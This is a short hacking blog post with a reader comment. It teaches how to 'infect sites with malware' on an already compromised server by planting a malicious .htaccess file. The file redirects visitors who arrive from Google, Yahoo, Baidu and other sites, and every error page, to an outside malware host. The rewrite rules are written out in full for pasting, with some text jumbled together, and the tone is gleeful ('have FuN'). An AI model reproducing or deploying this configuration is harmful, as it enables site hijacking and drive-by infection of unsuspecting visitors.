hi guys today i am gonna show you how hackers sometimes infect sites with malware (recently if you are aware about Zone-h bring malwared )
So what we need
- shelled server
- writable .htacess
RewriteEngine Onand save it now your server will be infected with malware.. and if you open it in google chrome it will show you warning.. have FuN
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L]
RewriteEngine On
ErrorDocument 400 http://villusoftreit.ru/in.cgi?3
ErrorDocument 401 http://villusoftreit.ru/in.cgi?3
ErrorDocument 403 http://villusoftreit.ru/in.cgi?3
ErrorDocument 404 http://villusoftreit.ru/in.cgi?3
ErrorDocument 500 http://villusoftreit.ru/in.cgi?3
1 comments:
didn't find this thing anywhere else,
thanks bro ;)
-Lane_Stalker
(supermod of screenfreezer.com)
Post a Comment